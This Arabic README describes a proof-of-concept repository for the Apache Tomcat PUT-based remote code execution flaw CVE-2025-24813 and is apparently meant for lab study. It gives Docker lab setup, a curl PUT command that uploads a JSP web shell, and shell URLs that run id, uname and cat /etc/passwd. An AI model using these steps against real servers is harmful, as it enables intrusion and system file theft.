
Apache Tomcat PUT JSP RCE - CVE-2025-24813 - استغلال و PoC
يحتوي هذا المستودع على إثبات مفهوم كامل (PoC) لـ CVE-2025-24813، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في Apache Tomcat باستخدام طريقة HTTP PUT لنشر شل ويب JSP خبيثة.
🔥 يوضح هذا الاستغلال كيف يمكن للمهاجم تحقيق RCE عبر تحميل الملفات وتنفيذ الحمولة في مثيلات Tomcat غير المؤمنة بشكل صحيح.
CVE-2025-24813/
├── docker/
│ ├── Dockerfile
│ └── web.xml
├── exploit/
│ ├── 1_exploit_cve_2025_24813.py
│ └── shell.jsp
├── screenshots/
│ ├── 1_tomcat_running.png
│ ├── 2_docker_started.png
│ ├── 3_upload_shell.png
│ ├── 4_run_python_exploit.png
│ ├── 5_access_shell_whoami.png
│ ├── 6_view_etc_passwd.png
│ ├── 7_run_uname.png
│ ├── 8_run_id.png
│ └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat
📸 
📸 
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp
📸 
python3 exploit/1_exploit_cve_2025_24813.py
📸 
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd
📸 
📸 
📸 
📸 
📸 
web.xml أو تهيئة الخادمهذا المشروع هو لأغراض تعليمية وبحثية فقط. الاختبار أو الاستغلال أو الاستخدام غير المصرح به للأنظمة التي لا تملكها أو ليس لديك إذن لاختبارها يعد غير قانوني وغير أخلاقي.
Shivshant Patil
مخترق أخلاقي معتمد (CEH v13)
خريج بكالوريوس تكنولوجيا في هندسة الحاسوب
🔗 LinkedIn
🔗 GitHub